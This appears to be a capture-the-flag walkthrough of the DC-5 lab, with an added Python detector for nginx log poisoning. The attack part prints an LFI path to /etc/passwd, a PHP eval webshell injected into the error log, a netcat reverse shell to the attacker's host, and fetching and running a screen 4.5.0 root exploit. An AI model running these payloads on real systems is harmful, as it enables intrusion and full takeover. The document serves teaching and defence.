
DC Series Target Machines: DC-5

1. Environment setup

VMware 17, downloaded from the official site

Kali 2023.4: https://mirrors.tuna.tsinghua.edu.cn/kali-images/kali-2023.4/

Target VM: https://download.vulnhub.com/dc/DC-5.zip

2. Steps

First, host discovery;

Matching the MAC address against the VM, the target's IP is 192.168.20.147;

Next, a port scan;

Port 80 is open, so open it in a browser;

An ordinary page;

Try a directory scan;

It turns up a page named footer.php;

Open it;

On contact.php, after submitting the form, the line at the bottom of the resulting thankyou.php page changes;

Recalling the footer.php found earlier, thankyou.php probably includes footer.php through a parameter;

http://192.168.20.147/thankyou.php?file=footer.php

So there may be a file inclusion vulnerability here;

Try reading /etc/passwd through directory traversal (thankyou.php lives in /var/www/html, so three ../ would be enough; the extra one is harmless because .. at / stays at /):

http://192.168.20.147/thankyou.php?file=../../../../etc/passwd

Sure enough, the passwd file comes back: a local file inclusion (LFI) with no filtering on the file parameter;

Now push the file inclusion further: log poisoning;

Read the nginx error log through the include (the default path on Debian; this is also where php-fpm's stderr ends up on this box, as the entries below show);

file=../../../../var/log/nginx/error.log

Log contents:

2024/10/17 01:13:37 [error] 560#0: *54419 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined index: file in /var/www/html/thankyou.php on line 41" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou%2ephp HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147"
2024/10/17 01:15:57 [error] 559#0: *57807 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined index: file in /var/www/html/thankyou.php on line 41" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?firstname=1&lastname=&country=australia&subject= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147", referrer: "http://192.168.20.147/contact.php"
2024/10/17 01:16:06 [error] 559#0: *57807 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined index: file in /var/www/html/thankyou.php on line 41" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?firstname=2&lastname=&country=australia&subject= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147", referrer: "http://192.168.20.147/contact.php"
2024/10/17 01:16:34 [error] 559#0: *57807 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined index: file in /var/www/html/thankyou.php on line 41" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?firstname=1&lastname=&country=australia&subject= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147", referrer: "http://192.168.20.147/contact.php"
2024/10/17 01:17:53 [error] 559#0: *57817 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined index: file in /var/www/html/thankyou.php on line 41" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?firstname=1&lastname=&country=australia&subject= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147", referrer: "http://192.168.20.147/contact.php"
2024/10/17 01:32:16 [error] 559#0: *57832 FastCGI sent in stderr: "PHP message: PHP Warning:  include(file=../../../../var/log/nginx/error.log): failed to open stream: No such file or directory in /var/www/html/thankyou.php on line 44
PHP message: PHP Warning:  include(): Failed opening 'file=../../../../var/log/nginx/error.log' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/html/thankyou.php on line 44" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?file=file=../../../../var/log/nginx/error.log HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147", referrer: "http://192.168.20.147/contact.php"

Next, write a webshell into that log (log poisoning). Nothing is uploaded: the PHP one-liner is passed as the file parameter, include() fails to open a "file" by that name, and PHP's warning, which quotes the bad filename verbatim, reaches error.log through FastCGI's stderr, exactly as the last entry in the excerpt above did for the mistyped file=file= value;

http://192.168.20.147/thankyou.php?file=<?php @eval($_POST["cmd"]); ?>

(The browser percent-encodes the tag in the request line; PHP decodes it again before the include, so the plain <?php ... ?> is what lands in the log.)

Now include the poisoned log again and connect with AntSword;

AntSword connects successfully;

Connection URL: http://192.168.20.147/thankyou.php?file=../../../../var/log/nginx/error.log
Connection password: cmd

Every request that includes the log re-runs the injected tag, so the log acts as a persistent backdoor until it is rotated or truncated.

Start a listener on Kali (192.168.20.151);

nc -lnvp 4444

From the webshell, spawn a reverse shell back to it;

nc -nv 192.168.20.151 4444 -c /bin/bash

(-c is a netcat-traditional option; the OpenBSD nc does not have it, in which case a bash /dev/tcp one-liner or the mkfifo trick is the usual fallback.)

Upgrade it to an interactive TTY;

python -c "import pty;pty.spawn('/bin/bash')"

Next, privilege escalation;

Try SUID-based escalation: list every SUID binary;

find / -perm -4000 2>/dev/null

A binary named screen-4.5.0 stands out in the list;

Use searchsploit (bundled with Kali) to look for known vulnerabilities in screen 4.5.0;

searchsploit screen 4.5.0

Mirror the matching local-root exploit (EDB-ID 41154, "GNU Screen 4.5.0 - Local Privilege Escalation") into the current directory;

searchsploit -m 41154

cp 41154.sh run.sh

dos2unix run.sh

(dos2unix strips the CRLF line endings, which would otherwise break the #!/bin/bash shebang on the target.)

Serve it from Kali with Python's built-in web server;

python -m http.server 5555

Then fetch it on the target;

wget -c 192.168.20.151:5555/run.sh

The script downloads successfully;

chmod 777 run.sh
./run.sh

(chmod +x would do. The script compiles two small C programs with gcc on the target, drops them in /tmp, abuses the SUID screen's logfile handling to append /tmp/libhax.so to /etc/ld.so.preload, and then runs the SUID /tmp/rootshell it created, so it needs gcc and a writable /tmp on the box.)

Root obtained, and the flag is in /root;

3. Takeaways

Exploiting a file inclusion vulnerability, including log poisoning;

Details of the nc command (listener, connect-back, -c);

For privilege escalation, first check whether a known vulnerability exists for anything unusual in the SUID list;

Using Python's built-in web server to move scripts onto the target;

Nginx's default log file paths.
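The same nginx error log seen from the defender's side, as an added example that is not the post's code: it groups physical lines into entries (a PHP warning with an embedded newline, like the last one in the excerpt, spans two lines), percent-decodes the request URI twice, and flags traversal, reads of log or wrapper paths, and PHP tags quoted inside include() warnings, which is the signature of the poisoning done above. It goes slightly beyond the page by also catching double encoding and php:// wrappers. The sample entries are constructed in the excerpt's format (timestamps and connection ids are made up); the tag names and regexes are mine.

```python
import re
import urllib.parse

TS = re.compile(r"^\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2} \[\w+\]")
REQUEST = re.compile(r'request: "[A-Z]+ (?P<uri>\S+)')
CLIENT = re.compile(r"client: (?P<ip>[^,]+)")
INCLUDE = re.compile(r"include\((?P<target>.*?)\): failed to open stream")
TRAVERSAL = re.compile(r"\.\./|\.\.\\")
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.I)
SENSITIVE = re.compile(r"/var/log/|/proc/self/|php://|data:", re.I)


def entries(lines):
    """Group physical lines into entries: a line without a timestamp continues
    the previous entry (multi-line PHP warnings, as in the excerpt)."""
    out = []
    for line in lines:
        line = line.rstrip("\n")
        if not line.strip():
            continue
        if TS.match(line.lstrip()) or not out:
            out.append(line.lstrip())
        else:
            out[-1] += "\n" + line
    return out


def decode(s):
    """Percent-decode twice so a double-encoded %252e%252e%252f is caught too."""
    return urllib.parse.unquote(urllib.parse.unquote(s))


def classify(entry):
    """Set of tags for one entry; empty for benign noise such as the
    'Undefined index: file' notices."""
    m = REQUEST.search(entry)
    uri = decode(m.group("uri")) if m else ""
    inc = INCLUDE.search(entry)
    target = inc.group("target") if inc else ""
    tags = set()
    for text in (uri, target):
        if TRAVERSAL.search(text):
            tags.add("traversal")
        if PHP_TAG.search(text):
            tags.add("php_tag")           # PHP code quoted into the log: poisoning
        if SENSITIVE.search(text):
            tags.add("sensitive_include")
    return tags


def scan(lines):
    """(client, tags, first 80 chars) for every suspicious entry."""
    hits = []
    for e in entries(lines):
        tags = classify(e)
        if tags:
            c = CLIENT.search(e)
            hits.append((c.group("ip") if c else "?", tags, e.split("\n", 1)[0][:80]))
    return hits


# Constructed sample in the format of the excerpt above (timestamps and
# connection ids are made up).
TAIL = (' while reading response header from upstream, client: 192.168.20.1, '
        'server: _, request: "GET %s HTTP/1.1", upstream: '
        '"fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147"')
SAMPLE = [
    '2024/10/17 01:13:37 [error] 560#0: *54419 FastCGI sent in stderr: "PHP message: '
    'PHP Notice:  Undefined index: file in /var/www/html/thankyou.php on line 41"'
    + TAIL % "/thankyou%2ephp",
    '2024/10/17 01:32:16 [error] 559#0: *57832 FastCGI sent in stderr: "PHP message: '
    'PHP Warning:  include(file=../../../../var/log/nginx/error.log): failed to open '
    'stream: No such file or directory in /var/www/html/thankyou.php on line 44',
    "PHP message: PHP Warning:  include(): Failed opening 'file=../../../../var/log/"
    "nginx/error.log' for inclusion in /var/www/html/thankyou.php on line 44\""
    + TAIL % "/thankyou.php?file=file=../../../../var/log/nginx/error.log",
    '2024/10/17 01:40:02 [error] 559#0: *57850 FastCGI sent in stderr: "PHP message: '
    'PHP Warning:  include(<?php @eval($_POST["cmd"]); ?>): failed to open stream: '
    'No such file or directory in /var/www/html/thankyou.php on line 44"'
    + TAIL % "/thankyou.php?file=%3C%3Fphp%20%40eval%28%24_POST%5B%22cmd%22%5D%29%3B%20%3F%3E",
]

if __name__ == "__main__":
    for ip, tags, head in scan(SAMPLE):
        print(ip, sorted(tags), head)
```

Run against a real file with `scan(open("/var/log/nginx/error.log"))`. The php_tag rule is the important one: a PHP tag inside an include() warning means an attacker has already managed to write code into the log, and the log should be treated as a backdoor until truncated.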


http://www.kler.cn/a/350180.html
